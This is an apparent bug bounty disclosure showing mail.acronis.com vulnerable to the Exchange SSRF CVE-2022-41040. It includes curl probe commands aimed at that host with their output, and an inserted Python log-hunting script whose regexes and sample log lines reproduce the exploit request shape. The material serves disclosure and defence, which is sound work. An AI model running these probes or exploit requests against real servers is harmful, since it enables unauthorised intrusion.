mail.acronis.com is vulnerable to zero-day vulnerability CVE-2022-41040
Critical
Acronis
Team Summary
Official summary from Acronis
mail.acronis.com was vulnerable to CVE-2022-41040. After internal investigation, Acronis security team concluded that there are no signs of exploitation of this issue.
Reported by
bbece5b1ea2cbb33d0690ad
Vulnerability Details
Technical details and impact analysis
Hello Acronis team,
Please run

```
curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync"
curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol
```

and get the following output:

```
404
{"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"}
```

This proves that mail.acronis.com is vulnerable to CVE-2022-41040.

PoC video attached.
## Impact
SSRF can be used for unauthorized actions or access to confidential data.
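The report ends with an external probe; the team summary states that the internal investigation found no signs of exploitation. As an added example (not code from the report, the reporter, or Acronis), the following Python hunts IIS W3C logs on an Exchange front end for the two request shapes relevant to CVE-2022-41040: the full ProxyNotShell chain (autodiscover.json with an `@` and a path to the PowerShell backend, the shape Microsoft's IIS URL Rewrite mitigation and its Select-String hunting one-liner match on) and the read-only probe used in the report (Email= pointed back under autodiscover/). It goes beyond the single probe above by covering the exploit chain as well. The log excerpt, client IPs and hostnames are constructed placeholders; the column layout is read from the log's own `#Fields:` directive, and the request URI is URL-decoded before matching so `%3F`/`%40` encodings do not evade the regexes.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt for the example (placeholder IPs/hosts; not data from the report).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2022-10-03 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2022-10-03 08:12:01 10.0.0.5 GET /owa/ - 443 - 203.0.113.10 Mozilla/5.0 - 200 0 0 120
2022-10-03 08:12:30 10.0.0.5 POST /autodiscover/autodiscover.json @example.org/powershell&Email=autodiscover/autodiscover.json%3F@example.org 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 340
2022-10-03 08:13:02 10.0.0.5 GET /autodiscover/autodiscover.json Email=autodiscover/autodiscover.json%3F@example.org&Protocol=ActiveSync 443 - 198.51.100.8 curl/7.85.0 - 404 0 0 15
2022-10-03 08:14:00 10.0.0.5 GET /autodiscover/autodiscover.json Email=user@example.org&Protocol=ActiveSync 443 - 203.0.113.11 Outlook/16.0 - 200 0 0 40
2022-10-03 08:15:10 10.0.0.5 POST /autodiscover/autodiscover.json @example.org/powershell&Email=autodiscover/autodiscover.json%3F@example.org 443 - 198.51.100.7 Mozilla/5.0 - 401 0 0 30
"""

# Exploit chain: the Autodiscover SSRF (autodiscover.json?@host/...) reaching the PowerShell
# backend. Same shape as the pattern in Microsoft's IIS URL Rewrite mitigation for this CVE.
EXPLOIT_RE = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)
# Read-only probe as used in the report above: Email= set to a path back under autodiscover/.
PROBE_RE = re.compile(r"autodiscover\.json.*[?&]email=autodiscover/", re.IGNORECASE)


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the column names in the #Fields directive."""
    fields = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before #Fields directive at line %d" % lineno)
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        rec = dict(zip(fields, values))
        rec["_line"] = lineno
        yield rec


def url_decode_fully(s, max_rounds=3):
    """Decode repeatedly (bounded) so double-encoded '?'/'@' cannot slip past the regexes."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return decoded
        s = decoded
    return s


def decoded_uri(rec):
    """Rebuild path?query from the IIS stem/query columns and URL-decode it."""
    stem = rec.get("cs-uri-stem", "-")
    query = rec.get("cs-uri-query", "-")
    uri = stem if query == "-" else stem + "?" + query
    return url_decode_fully(uri)


def hunt(text):
    """Return findings for exploit-chain and probe requests found in an IIS log."""
    findings = []
    for rec in parse_iis_log(text):
        uri = decoded_uri(rec)
        if EXPLOIT_RE.search(uri):
            kind = "exploit-chain"
        elif PROBE_RE.search(uri):
            kind = "probe"
        else:
            continue
        status = rec.get("sc-status", "-")
        findings.append({
            "line": rec["_line"],
            "kind": kind,
            "client": rec.get("c-ip", "-"),
            "status": status,
            # A 200 on the exploit-chain shape is what is worth escalating; a probe only
            # shows scanning, not that the SSRF was used for anything.
            "likely_success": kind == "exploit-chain" and status == "200",
            "uri": uri,
        })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print("line %(line)d %(kind)s client=%(client)s status=%(status)s success=%(likely_success)s" % f)
```

Point `hunt()` at the contents of the W3C logs under the Exchange front-end site (and the HttpProxy logs, which use the same directive format) after patching; the probe pattern will also match your own verification requests, so tie hits back to known scanner sources before treating them as attacker activity.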
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2022-41040
HIGH
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Weakness
Server-Side Request Forgery (SSRF)